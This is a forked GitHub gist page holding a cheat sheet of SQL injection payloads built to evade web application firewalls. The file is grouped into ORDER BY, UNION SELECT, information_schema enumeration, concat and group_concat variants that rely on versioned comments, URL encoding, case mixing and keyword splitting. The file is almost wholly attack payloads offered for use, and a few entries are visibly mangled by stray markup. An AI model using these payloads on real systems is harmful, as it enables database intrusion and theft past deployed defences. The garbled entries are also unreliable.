Skip to content

Instantly share code, notes, and snippets.

@naurizs

naurizs/sqli-bypass-waf.txt

Forked from zetc0de/sqli-bypass-waf.txt
Created August 12, 2021 14:11
Show Gist options
  • Save naurizs/ecff10d0f12ee879f26f95f8bbd426c4 to your computer and use it in GitHub Desktop.
Save naurizs/ecff10d0f12ee879f26f95f8bbd426c4 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @zetc0de zetc0de created this gist Jun 26, 2018.
    155 changes: 155 additions & 0 deletions sqli-bypass-waf.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,155 @@
    [~] order by [~]

    /**/ORDER/**/BY/**/
    /*!order*/+/*!by*/
    /*!ORDER BY*/
    /*!50000ORDER BY*/
    /*!50000ORDER*//**//*!50000BY*/
    /*!12345ORDER*/+/*!BY*/

    [~] UNION select [~]

    /*!50000%55nIoN*/ /*!50000%53eLeCt*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!%55NiOn*/ /*!%53eLEct*/
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    +%2F**/+Union/*!select*/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
    +union+distinct+select+
    +union+distinctROW+select+
    uNiOn aLl sElEcT
    UNIunionON+SELselectECT
    /**/union/*!50000select*//**/
    0%a0union%a0select%09
    %0Aunion%0Aselect%0A
    %55nion/**/%53elect
    uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
    %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
    %0A%09UNION%0CSELECT%10NULL%
    /*!union*//*--*//*!all*//*--*//*!select*/
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
    /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
    +UnIoN/*&a=*/SeLeCT/*&a=*/
    union+sel%0bect
    +uni*on+sel*ect+
    +#1q%0Aunion all#qa%0A#%0Aselect
    union(select (1),(2),(3),(4),(5))
    UNION(SELECT(column)FROM(table))
    %23xyz%0AUnIOn%23xyz%0ASeLecT+
    %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
    union(select(1),2,3)
    union (select 1111,2222,3333)
    uNioN (/*!/**/ SeleCT */ 11)
    union (select 1111,2222,3333)
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
    %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
    +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
    +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
    /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
    +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
    /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
    /union\sselect/g
    /union\s+select/i
    /*!UnIoN*/SeLeCT
    +UnIoN/*&a=*/SeLeCT/*&a=*/
    +uni>on+sel>ect+
    +(UnIoN)+(SelECT)+
    +(UnI)(oN)+(SeL)(EcT)
    +’UnI”On’+'SeL”ECT’
    +uni on+sel ect+
    +/*!UnIoN*/+/*!SeLeCt*/+
    /*!u%6eion*/ /*!se%6cect*/
    uni%20union%20/*!select*/%20
    union%23aa%0Aselect
    /**/union/*!50000select*/
    /^.*union.*$/ /^.*select.*$/
    /*union*/union/*select*/select+
    /*uni X on*/union/*sel X ect*/
    +un/**/ion+sel/**/ect+
    +UnIOn%0d%0aSeleCt%0d%0a
    UNION/*&test=1*/SELECT/*&pwn=2*/
    un?<ion sel="">+un/**/ion+se/**/lect+
    +UNunionION+SEselectLECT+
    +uni%0bon+se%0blect+
    %252f%252a*/union%252f%252a /select%252f%252a*/
    /%2A%2A/union/%2A%2A/select/%2A%2A/
    %2f**%2funion%2f**%2fselect%2f**%2f
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    /*!UnIoN*/SeLecT+

    [~] information_schema.tables [~]

    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
    /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
    /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

    [~] concat() [~]

    CoNcAt()
    concat()
    CON%08CAT()
    CoNcAt()
    %0AcOnCat()
    /**//*!12345cOnCat*/
    /*!50000cOnCat*/(/*!*/)
    unhex(hex(concat(table_name)))
    unhex(hex(/*!12345concat*/(table_name)))
    unhex(hex(/*!50000concat*/(table_name)))

    [~] group_concat() [~]

    /*!group_concat*/()
    gRoUp_cOnCAt()
    group_concat(/*!*/)
    group_concat(/*!12345table_name*/)
    group_concat(/*!50000table_name*/)
    /*!group_concat*/(/*!12345table_name*/)
    /*!group_concat*/(/*!50000table_name*/)
    /*!12345group_concat*/(/*!12345table_name*/)
    /*!50000group_concat*/(/*!50000table_name*/)
    /*!GrOuP_ConCaT*/()
    /*!12345GroUP_ConCat*/()
    /*!50000gRouP_cOnCaT*/()
    /*!50000Gr%6fuP_c%6fnCAT*/()
    unhex(hex(group_concat(table_name)))
    unhex(hex(/*!group_concat*/(/*!table_name*/)))
    unhex(hex(/*!12345group_concat*/(table_name)))
    unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
    unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
    unhex(hex(/*!50000group_concat*/(table_name)))
    unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
    unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
    convert(group_concat(table_name)+using+ascii)
    convert(group_concat(/*!table_name*/)+using+ascii)
    convert(group_concat(/*!12345table_name*/)+using+ascii)
    convert(group_concat(/*!50000table_name*/)+using+ascii)
    CONVERT(group_concat(table_name)+USING+latin1)
    CONVERT(group_concat(table_name)+USING+latin2)
    CONVERT(group_concat(table_name)+USING+latin3)
    CONVERT(group_concat(table_name)+USING+latin4)
    CONVERT(group_concat(table_name)+USING+latin5)